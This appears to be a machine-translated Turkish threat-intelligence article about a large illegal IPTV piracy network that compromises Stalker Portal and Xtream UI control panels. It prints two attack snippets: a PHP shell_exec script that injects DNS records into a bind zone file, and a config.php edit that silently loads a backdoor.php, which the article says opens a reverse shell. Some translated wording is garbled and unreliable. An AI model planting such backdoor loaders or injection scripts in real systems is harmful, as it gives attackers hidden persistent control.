1.100’den fazla alanda ve 10.000’den fazla IP adresinde faaliyet gösteren Yasadışı İnternet Protokolü Televizyonu (IPTV) hizmetlerinden oluşan bir ağı keşfedildi.
Birkaç yıldır aktif kalan bu yayılan altyapı, lisans anlaşmaları olmadan, büyük spor ligleri, abonelik hizmetleri ve isteğe bağlı platformlar da dahil olmak üzere yetkisiz premium içerik akışları sunar.
Sessiz Push analistleri, bu ağın hem yüksek hacimli IP adres havuzlarını hem de hızla dönen alanları kullanmasının korsanlık taktiklerinde önemli bir artış olduğunu ve geleneksel yayından kaldırma süreçlerini neredeyse boş hale getirdiğini belirtti.
Özünde, ağ, Stalker Portal ve Xtream kullanıcı arayüzü gibi değiştirilmiş açık kaynaklı yazılımlar etrafında inşa edilmiş özelleştirilmiş IPTV panellerine dayanmaktadır.
Bu paneller, operatörlerin yüz binlerce eşzamanlı oturum sağlanmasını sağlayarak otomatik kullanıcı kimlik doğrulamasını ve akış dağıtımını kolaylaştırır.
Operatörler, tek bir ön uç alanına bağlı olmak yerine, akışların gerçek kökenini gizlemek için büyük bir proxy alan adları havuzu kullanırlar-her türlü paylaşılan IP adresine çözülür.
Sessiz Push araştırmacıları, Xuione ve Tiyansoft olmak üzere iki şirket ve Afganistan’ın Herat, Nabi Neamati adlı iki şirketi tanımladılar.
.webp)
Saldırı vektörleri sunucu tarafı sömürüsü ve kimlik bilgisi hasat ile başlar. Kötü niyetli aktörler, az korunan web ana bilgisayarlarından ödün veriyor veya meşru akış kontrol yazılımına geri dönen özel modülleri yüklemek için modası geçmiş kontrol panellerini kullanıyor.
Birçok durumda, operatörler CPanel, Plesk ve Stalker portal kurulumlarındaki varsayılan kimlik bilgilerini kullanarak başlangıç erişimini sağlar.
Erişim güvence altına alındıktan sonra, bir dağıtım komut dosyası – genellikle Base64 kodlama yoluyla gizlenmiş – yeni alanların kaydını ve akış uç noktalarının döndürülmesini otomatikleştirmek için değiştirilmiş PHP dosyalarını ve CRON işlerini doldurur.
Silent Push analistleri, yeni sanal ana bilgisayarları kaydetmek için aşağıdaki kod snippet’ini kullanan böyle bir komut dosyasını tanımladı:
$domain = trim(shell_exec('wp option get siteurl'));
$ipList = ['158.220.114.199','46.202.197.208'];
foreach ($ipList as $ip) {
shell_exec("echo '$domain IN A $ip' >> /etc/bind/db.piracy");
}
shell_exec('rndc reload');Tekrarlanan yayından kaldırma isteklerine rağmen, ağın hem alanları hem de IP adreslerini döndürme çevikliği, operasyonel kalmasına izin verir.
Yeni alanlar neredeyse her gün görünür ve her biri kurşun geçirmez barındırma sağlayıcıları aracılığıyla sağlanan dinamik IP adresleri kümelerine karar verir.
Bu esnek yapı, hizmeti bozmaya çalışan hak sahipleri ve kolluk kuvvetleri için zorlu bir zorluk oluşturmaktadır.
Kontrol paneli istismarları yoluyla enfeksiyon mekanizması
Bu IPTV korsanlık ağının özellikle sinsi bir yönü, tehlikeye atılan kontrol panellerine odaklanan enfeksiyon mekanizmasıdır.
.webp)
Operatörler, 80, 8080 ve 2095 bağlantı noktalarındaki savunmasız uç noktaları tespit etmek için otomatik tarayıcılar kullanarak Stalker portalı ve Xtream kullanıcı arayüzünün yanlış yapılandırılmış veya modası geçmiş kurulumları için İnternet’i inceliyor.
.webp)
Bir hedef belirledikten sonra, düşük profilli bir keşif modülü ile başlayan çok aşamalı bir yük kullanırlar.
Bu modül mevcut kullanıcı hesaplarını numaralandırır, karma kimlik bilgilerini toplar ve API anahtarlarını içeren yapılandırma dosyalarını pespiltratlar.
İkinci aşama, aşağıda değiştirerek kalıcı bir arka kapı yükler. config.php Panelin dizininde dosya:-
if (!defined('IPTV_INIT')) {
define('IPTV_INIT', true);
require_once __DIR__ . '/backdoor.php';
}Arka kapı senaryosu, backdoor.phpbir yönetici oturum açtığında bir komut ve kontrol sunucusuna ters bir kabuk oluşturur ve saldırganlara panel üzerinde etkili bir şekilde tam kontrol verir.
Bu kalıcı taban, barındırma altyapısı, kesintisiz etki alanı kaydı ve dinamik IP ataması için sürekli güncellemeler sağlar – bu da yeni giriş noktalarının kaldırılanların yerini almasını sağlar.
Sonuç olarak, ağ büyük ölçekli korsan operasyonlarını minimum kesintiye sahip olabilir.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.